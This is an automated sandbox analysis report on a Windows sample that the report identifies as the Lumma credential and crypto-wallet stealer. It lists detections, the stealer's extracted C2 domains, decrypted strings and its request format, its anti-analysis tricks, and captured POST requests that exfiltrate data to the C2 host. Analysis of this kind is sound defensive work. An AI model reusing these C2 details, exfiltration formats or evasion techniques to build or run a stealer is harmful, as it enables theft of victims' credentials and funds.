Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
onaUtwpiyq.exe

Overview

General Information

Sample name:onaUtwpiyq.exe
renamed because original name is a hash value
Original sample name:7c96eee8e62caedad10358116f0b8024.exe
Analysis ID:1581242
MD5:7c96eee8e62caedad10358116f0b8024
SHA1:1816e4f69b7bf7e9b8a2a04ab5d0694896284357
SHA256:ca2141db806dcfd4769d08d2bfa07449353fb1137d1aa3664f9afbd8e506d7b1
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • onaUtwpiyq.exe (PID: 3784 cmdline: "C:\Users\user\Desktop\onaUtwpiyq.exe" MD5: 7C96EEE8E62CAEDAD10358116F0B8024)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["rebuildeso.buzz", "inherineau.buzz", "appliacnesot.buzz", "prisonyfork.buzz", "cashfuzysao.buzz", "screwamusresz.buzz", "mindhandru.buzz", "hummskitnj.buzz", "scentniej.buzz"], "Build id": "PsFKDg--pablo"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000003.1482497732.00000000007E8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000003.1482232390.00000000007E2000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: onaUtwpiyq.exe PID: 3784JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
            Process Memory Space: onaUtwpiyq.exe PID: 3784JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Process Memory Space: onaUtwpiyq.exe PID: 3784JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
                Click to see the 1 entries

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T09:01:54.542493+010020283713Unknown Traffic192.168.2.949712104.21.11.101443TCP
                2024-12-27T09:01:56.513604+010020283713Unknown Traffic192.168.2.949718104.21.11.101443TCP
                2024-12-27T09:01:59.055245+010020283713Unknown Traffic192.168.2.949724104.21.11.101443TCP
                2024-12-27T09:02:01.352480+010020283713Unknown Traffic192.168.2.949730104.21.11.101443TCP
                2024-12-27T09:02:03.785693+010020283713Unknown Traffic192.168.2.949736104.21.11.101443TCP
                2024-12-27T09:02:06.688005+010020283713Unknown Traffic192.168.2.949742104.21.11.101443TCP
                2024-12-27T09:02:09.428663+010020283713Unknown Traffic192.168.2.949749104.21.11.101443TCP
                2024-12-27T09:02:12.999874+010020283713Unknown Traffic192.168.2.949760104.21.11.101443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T09:01:55.271561+010020546531A Network Trojan was detected192.168.2.949712104.21.11.101443TCP
                2024-12-27T09:01:57.379739+010020546531A Network Trojan was detected192.168.2.949718104.21.11.101443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T09:01:55.271561+010020498361A Network Trojan was detected192.168.2.949712104.21.11.101443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T09:01:57.379739+010020498121A Network Trojan was detected192.168.2.949718104.21.11.101443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T09:02:07.587181+010020480941Malware Command and Control Activity Detected192.168.2.949742104.21.11.101443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T09:02:09.432641+010028438641A Network Trojan was detected192.168.2.949749104.21.11.101443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: onaUtwpiyq.exeAvira: detected
                Antivirus detection for URL or domain
                Source: https://mindhandru.buzz/CCfAvira URL Cloud: Label: malware
                Source: https://mindhandru.buzz/LAvira URL Cloud: Label: malware
                Source: https://mindhandru.buzz/CDAvira URL Cloud: Label: malware
                Source: https://mindhandru.buzz/rsAvira URL Cloud: Label: malware
                Source: https://mindhandru.buzz/YAvira URL Cloud: Label: malware
                Found malware configuration
                Source: onaUtwpiyq.exe.3784.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["rebuildeso.buzz", "inherineau.buzz", "appliacnesot.buzz", "prisonyfork.buzz", "cashfuzysao.buzz", "screwamusresz.buzz", "mindhandru.buzz", "hummskitnj.buzz", "scentniej.buzz"], "Build id": "PsFKDg--pablo"}
                Multi AV Scanner detection for submitted file
                Source: onaUtwpiyq.exeVirustotal: Detection: 67%Perma Link
                Source: onaUtwpiyq.exeReversingLabs: Detection: 60%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: onaUtwpiyq.exeJoe Sandbox ML: detected
                Sample uses string decryption to hide its real strings
                Source: 00000000.00000003.1356716205.0000000004880000.00000004.00001000.00020000.00000000.sdmpString decryptor: hummskitnj.buzz
                Source: 00000000.00000003.1356716205.0000000004880000.00000004.00001000.00020000.00000000.sdmpString decryptor: cashfuzysao.buzz
                Source: 00000000.00000003.1356716205.0000000004880000.00000004.00001000.00020000.00000000.sdmpString decryptor: appliacnesot.buzz
                Source: 00000000.00000003.1356716205.0000000004880000.00000004.00001000.00020000.00000000.sdmpString decryptor: screwamusresz.buzz
                Source: 00000000.00000003.1356716205.0000000004880000.00000004.00001000.00020000.00000000.sdmpString decryptor: inherineau.buzz
                Source: 00000000.00000003.1356716205.0000000004880000.00000004.00001000.00020000.00000000.sdmpString decryptor: scentniej.buzz
                Source: 00000000.00000003.1356716205.0000000004880000.00000004.00001000.00020000.00000000.sdmpString decryptor: rebuildeso.buzz
                Source: 00000000.00000003.1356716205.0000000004880000.00000004.00001000.00020000.00000000.sdmpString decryptor: prisonyfork.buzz
                Source: 00000000.00000003.1356716205.0000000004880000.00000004.00001000.00020000.00000000.sdmpString decryptor: mindhandru.buzz
                Source: 00000000.00000003.1356716205.0000000004880000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000000.00000003.1356716205.0000000004880000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000000.00000003.1356716205.0000000004880000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                Source: 00000000.00000003.1356716205.0000000004880000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000000.00000003.1356716205.0000000004880000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
                Source: 00000000.00000003.1356716205.0000000004880000.00000004.00001000.00020000.00000000.sdmpString decryptor: PsFKDg--pablo
                Source: onaUtwpiyq.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.9:49712 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.9:49718 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.9:49724 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.9:49730 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.9:49736 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.9:49742 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.9:49749 version: TLS 1.2

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.9:49742 -> 104.21.11.101:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.9:49718 -> 104.21.11.101:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49718 -> 104.21.11.101:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.9:49712 -> 104.21.11.101:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49712 -> 104.21.11.101:443
                Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.9:49749 -> 104.21.11.101:443
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: rebuildeso.buzz
                Source: Malware configuration extractorURLs: inherineau.buzz
                Source: Malware configuration extractorURLs: appliacnesot.buzz
                Source: Malware configuration extractorURLs: prisonyfork.buzz
                Source: Malware configuration extractorURLs: cashfuzysao.buzz
                Source: Malware configuration extractorURLs: screwamusresz.buzz
                Source: Malware configuration extractorURLs: mindhandru.buzz
                Source: Malware configuration extractorURLs: hummskitnj.buzz
                Source: Malware configuration extractorURLs: scentniej.buzz
                Source: Joe Sandbox ViewIP Address: 104.21.11.101 104.21.11.101
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49712 -> 104.21.11.101:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49736 -> 104.21.11.101:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49760 -> 104.21.11.101:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49749 -> 104.21.11.101:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49724 -> 104.21.11.101:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49742 -> 104.21.11.101:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49718 -> 104.21.11.101:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49730 -> 104.21.11.101:443
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: mindhandru.buzz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 47Host: mindhandru.buzz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=DYUBSUUYZEJ58FRNYTUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12845Host: mindhandru.buzz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=29GKX58PQGNUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15021Host: mindhandru.buzz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=Q5ZLR9WWZ7ZJ9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20549Host: mindhandru.buzz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=F5ZQ1AADALN0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1183Host: mindhandru.buzz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=GLB0WX83DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 584814Host: mindhandru.buzz
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficDNS traffic detected: DNS query: mindhandru.buzz
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: mindhandru.buzz
                Source: onaUtwpiyq.exe, 00000000.00000003.1452801223.00000000053E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: onaUtwpiyq.exe, 00000000.00000003.1452801223.00000000053E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: onaUtwpiyq.exe, 00000000.00000003.1524399042.0000000000792000.00000004.00000020.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1506136966.0000000000791000.00000004.00000020.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1405319597.000000000078B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                Source: onaUtwpiyq.exe, 00000000.00000003.1452801223.00000000053E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: onaUtwpiyq.exe, 00000000.00000003.1452801223.00000000053E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: onaUtwpiyq.exe, 00000000.00000003.1452801223.00000000053E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: onaUtwpiyq.exe, 00000000.00000003.1452801223.00000000053E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: onaUtwpiyq.exe, 00000000.00000003.1452801223.00000000053E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: onaUtwpiyq.exe, 00000000.00000003.1452801223.00000000053E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: onaUtwpiyq.exe, 00000000.00000003.1452801223.00000000053E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: onaUtwpiyq.exe, 00000000.00000003.1452801223.00000000053E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: onaUtwpiyq.exe, 00000000.00000003.1452801223.00000000053E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: onaUtwpiyq.exe, 00000000.00000003.1406183581.000000000537D000.00000004.00000800.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1406244076.000000000537A000.00000004.00000800.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1406330511.000000000537A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: onaUtwpiyq.exe, 00000000.00000003.1454219729.00000000053D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696495411400900000.2&ci=1696495411208.
                Source: onaUtwpiyq.exe, 00000000.00000003.1454219729.00000000053D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696495411400900000.1&ci=1696495411208.12791&cta
                Source: onaUtwpiyq.exe, 00000000.00000003.1406183581.000000000537D000.00000004.00000800.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1406244076.000000000537A000.00000004.00000800.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1406330511.000000000537A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: onaUtwpiyq.exe, 00000000.00000003.1406183581.000000000537D000.00000004.00000800.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1406244076.000000000537A000.00000004.00000800.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1406330511.000000000537A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: onaUtwpiyq.exe, 00000000.00000003.1406183581.000000000537D000.00000004.00000800.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1406244076.000000000537A000.00000004.00000800.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1406330511.000000000537A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: onaUtwpiyq.exe, 00000000.00000003.1454219729.00000000053D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
                Source: onaUtwpiyq.exe, 00000000.00000003.1454219729.00000000053D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: onaUtwpiyq.exe, 00000000.00000003.1406183581.000000000537D000.00000004.00000800.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1406244076.000000000537A000.00000004.00000800.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1406330511.000000000537A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: onaUtwpiyq.exe, 00000000.00000003.1406183581.000000000537D000.00000004.00000800.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1406244076.000000000537A000.00000004.00000800.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1406330511.000000000537A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: onaUtwpiyq.exe, 00000000.00000003.1406183581.000000000537D000.00000004.00000800.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1406244076.000000000537A000.00000004.00000800.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1406330511.000000000537A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: onaUtwpiyq.exe, 00000000.00000003.1454219729.00000000053D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqd4plX4pbW1CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                Source: onaUtwpiyq.exe, 00000000.00000003.1405319597.000000000078B000.00000004.00000020.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1559836333.0000000000792000.00000004.00000020.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000002.1560904316.0000000000803000.00000004.00000020.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000002.1560751027.0000000000792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/
                Source: onaUtwpiyq.exe, 00000000.00000003.1451952470.00000000053D2000.00000004.00000800.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1452186757.00000000053D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/CCf
                Source: onaUtwpiyq.exe, 00000000.00000003.1478996451.00000000053D4000.00000004.00000800.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1478268121.00000000053D3000.00000004.00000800.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1478886618.00000000053D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/CD
                Source: onaUtwpiyq.exe, 00000000.00000003.1559590194.0000000000803000.00000004.00000020.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000002.1560904316.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/L
                Source: onaUtwpiyq.exe, 00000000.00000003.1405319597.0000000000773000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/Y
                Source: onaUtwpiyq.exe, 00000000.00000003.1405319597.000000000078B000.00000004.00000020.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1559836333.0000000000792000.00000004.00000020.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000002.1560440942.000000000076A000.00000004.00000020.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1550901642.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000002.1560904316.00000000007FA000.00000004.00000020.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1524291361.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1506033237.0000000000803000.00000004.00000020.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000002.1560751027.0000000000792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/api
                Source: onaUtwpiyq.exe, 00000000.00000003.1524291361.0000000000803000.00000004.00000020.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1559590194.0000000000803000.00000004.00000020.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1550821627.0000000000803000.00000004.00000020.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1405319597.000000000078B000.00000004.00000020.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000002.1560904316.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/pi
                Source: onaUtwpiyq.exe, 00000000.00000003.1506033237.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/rs
                Source: onaUtwpiyq.exe, 00000000.00000003.1453910932.000000000545F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: onaUtwpiyq.exe, 00000000.00000003.1453910932.000000000545F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: onaUtwpiyq.exe, 00000000.00000003.1454219729.00000000053D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_e149f5d53c9263616797a13067f7a114fa287709b159d0a5
                Source: onaUtwpiyq.exe, 00000000.00000003.1406183581.000000000537D000.00000004.00000800.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1406244076.000000000537A000.00000004.00000800.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1406330511.000000000537A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: onaUtwpiyq.exe, 00000000.00000003.1406183581.000000000537D000.00000004.00000800.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1406244076.000000000537A000.00000004.00000800.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1406330511.000000000537A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: onaUtwpiyq.exe, 00000000.00000003.1454219729.00000000053D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
                Source: onaUtwpiyq.exe, 00000000.00000003.1453910932.000000000545F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.HCe2hc5EPKfq
                Source: onaUtwpiyq.exe, 00000000.00000003.1453910932.000000000545F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.oX6J3D7V9Efv
                Source: onaUtwpiyq.exe, 00000000.00000003.1453910932.000000000545F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: onaUtwpiyq.exe, 00000000.00000003.1453910932.000000000545F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: onaUtwpiyq.exe, 00000000.00000003.1453910932.000000000545F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                Source: onaUtwpiyq.exe, 00000000.00000003.1453910932.000000000545F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
